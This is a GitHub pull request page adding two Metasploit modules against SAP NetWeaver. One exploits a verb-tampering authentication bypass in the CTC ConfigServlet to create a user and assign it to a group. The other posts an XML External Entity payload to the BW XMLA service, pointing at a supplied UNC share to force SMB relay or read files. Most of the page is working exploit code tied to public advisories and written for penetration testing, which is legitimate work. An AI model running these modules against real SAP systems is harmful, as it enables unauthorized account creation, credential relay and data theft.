Skip to content
This repository

SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay #1653

Closed
wants to merge 2 commits into from

1 participant

nmonkee
nmonkee

This module exploits the SAP NetWeaver BW XML External Entity vulnerability. An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function. The XXE vulnerability in SAP BW can lead to arbitrary file reading or an SMBRelay attack.

SAP Note 1597066 / DSECRG-12-033.

ref: http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity

nmonkee nmonkee closed this March 25, 2013
nmonkee nmonkee deleted the branch March 25, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
This page is out of date. Refresh to see the latest.
81  modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb
... ...
@@ -0,0 +1,81 @@
  1
+##
  2
+# This file is part of the Metasploit Framework and may be subject to
  3
+# redistribution and commercial restrictions. Please see the Metasploit
  4
+# Framework web site for more information on licensing and terms of use.
  5
+# http://metasploit.com/framework/
  6
+##
  7
+
  8
+##
  9
+# This module is based on, inspired by, or is a port of a plugin available in
  10
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
  11
+# http://www.onapsis.com/research-free-solutions.php.
  12
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
  13
+# in producing the Metasploit modules and was happy to share his knowledge and
  14
+# experience - a very cool guy.
  15
+#
  16
+# The following guys from ERP-SCAN deserve credit for their contributions -
  17
+# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
  18
+# Dmitry Evdokimov.
  19
+#
  20
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
  21
+# who have Beta tested the modules and provided excellent feedback. Some people
  22
+# just seem to enjoy hacking SAP :)
  23
+##
  24
+
  25
+require 'msf/core'
  26
+
  27
+class Metasploit4 < Msf::Auxiliary
  28
+	include Msf::Exploit::Remote::HttpClient
  29
+	include Msf::Auxiliary::Report
  30
+	include Msf::Auxiliary::Scanner
  31
+
  32
+	def initialize
  33
+		super(
  34
+			'Name' => 'SAP CTC Service Verb Tampering (add user and add role)',
  35
+			'Description' => %q{
  36
+									This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service.
  37
+									The service is vulnerable to verb tampering and allows for unauthorised user management.
  38
+									SAP Note 1589525, 1624450 / DSECRG-11-041.
  39
+								},
  40
+			'References' => [['URL','http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/']],
  41
+			'Author' => ['nmonkee'],
  42
+			'License' => MSF_LICENSE
  43
+			)
  44
+
  45
+		register_options([
  46
+			OptString.new('USER', [true, 'Username', nil]),
  47
+			OptString.new('PASS', [true, 'Password', nil]),
  48
+			OptString.new('GROUP', [true, 'Group', nil])
  49
+			], self.class)
  50
+	end
  51
+
  52
+	def run_host(ip)
  53
+		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USER'] + ',PASSWORD=' + datastore['PASS']
  54
+		send_request(uri)
  55
+		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USER'] + ',GROUPNAME=' + datastore['GROUP']
  56
+		send_request(uri)
  57
+	end
  58
+
  59
+	def send_request(uri)
  60
+		begin
  61
+			print_status("[SAP] #{rhost}:#{rport} - sending request")
  62
+			res = send_request_raw({
  63
+				'uri' => uri,
  64
+				'method' => 'HEAD',
  65
+				'headers' =>{
  66
+					'Cookie' => 'sap-usercontext=sap-language=EN',
  67
+					'Content-Type' => 'text/xml; charset=UTF-8',}
  68
+				}, 45)
  69
+			if res
  70
+				if datastore['VERBOSE'] == true
  71
+					print_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
  72
+					print_status("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s)
  73
+					print_status("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s)
  74
+				end
  75
+			end
  76
+			rescue ::Rex::ConnectionError
  77
+				print_error("#{rhost}:#{rport} - Unable to connect")
  78
+				return
  79
+			end
  80
+		end
  81
+	end
85  modules/auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay.rb
... ...
@@ -0,0 +1,85 @@
  1
+##
  2
+# This file is part of the Metasploit Framework and may be subject to
  3
+# redistribution and commercial restrictions. Please see the Metasploit
  4
+# Framework web site for more information on licensing and terms of use.
  5
+# http://metasploit.com/framework/
  6
+##
  7
+
  8
+##
  9
+# This module is based on, inspired by, or is a port of a plugin available in
  10
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
  11
+# http://www.onapsis.com/research-free-solutions.php.
  12
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
  13
+# in producing the Metasploit modules and was happy to share his knowledge and
  14
+# experience - a very cool guy.
  15
+#
  16
+# The following guys from ERP-SCAN deserve credit for their contributions -
  17
+# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
  18
+# Dmitry Evdokimov.
  19
+#
  20
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
  21
+# who have Beta tested the modules and provided excellent feedback. Some people
  22
+# just seem to enjoy hacking SAP :)
  23
+##
  24
+
  25
+require 'msf/core'
  26
+
  27
+class Metasploit4 < Msf::Auxiliary
  28
+	include Msf::Exploit::Remote::HttpClient
  29
+	include Msf::Auxiliary::Report
  30
+	include Msf::Auxiliary::Scanner
  31
+
  32
+	def initialize
  33
+		super(
  34
+			'Name' => 'SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay',
  35
+			'Description' => %q{
  36
+				This module exploits the SAP NetWeaver BW XML External Entity vulnerability.
  37
+				An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function.
  38
+				The XXE vulnerability in SAP BW can lead to arbitary file reading or an SMBRelay attack.
  39
+				SAP Note 1597066 / DSECRG-12-033.
  40
+				},
  41
+			'References' => [['URL','http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity/']],
  42
+			'Author' => ['nmonkee'],
  43
+			'License' => MSF_LICENSE
  44
+			)
  45
+
  46
+		register_options([
  47
+			OptString.new('CLIENT', [true, 'SAP client', nil]),
  48
+			OptString.new('USER', [true, 'Username', nil]),
  49
+			OptString.new('PASS', [true, 'Password', nil]),
  50
+			OptString.new('PATH',[true,'File path (e.g. \\xx.xx.xx.xx\share)',nil])
  51
+			], self.class)
  52
+	end
  53
+
  54
+	def run_host(ip)
  55
+		data = '<?xml version="1.0" encoding="utf-8" ?>'
  56
+		data = '<!DOCTYPE root ['
  57
+		data << '<!ENTITY foo SYSTEM "' + datastore['PATH'] + '">'
  58
+		data << ']>'
  59
+		data << '<in>&foo;</in>'
  60
+		user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
  61
+		begin
  62
+			print_status("[SAP] #{ip}:#{rport} - sending request for #{datastore['PATH']}")
  63
+			res = send_request_raw({
  64
+				'uri' => '/sap/bw/xml/soap/xmla?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  65
+				'method' => 'POST',
  66
+				'data' => data,
  67
+				'headers' =>{
  68
+					'Content-Length' => data.size.to_s,
  69
+					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  70
+					'Authorization' => 'Basic ' + user_pass,
  71
+					'Content-Type' => 'text/xml; charset=UTF-8',}
  72
+					}, 45)
  73
+			if res
  74
+				if datastore['VERBOSE'] == true
  75
+					print_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
  76
+					print_status("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s)
  77
+					print_status("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s)
  78
+				end
  79
+			end
  80
+			rescue ::Rex::ConnectionError
  81
+				print_error("#{rhost}:#{rport} - Unable to connect")
  82
+				return
  83
+			end
  84
+		end
  85
+	end
Commit_comment_tip

Tip: You can add notes to lines in a file. Hover to the left of a line to make a note

Something went wrong with that request. Please try again.